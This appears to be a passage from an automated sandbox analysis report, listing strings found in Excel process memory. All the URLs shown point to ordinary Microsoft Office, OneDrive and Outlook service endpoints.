Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comb
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.come
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comh
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comt
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks#d
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://onedrive.live.com
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falsebd
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/embed?i
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.net)v
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netEv
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office.com/
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.comW
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.comiUrlt?
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.coms
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonJ
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook~V
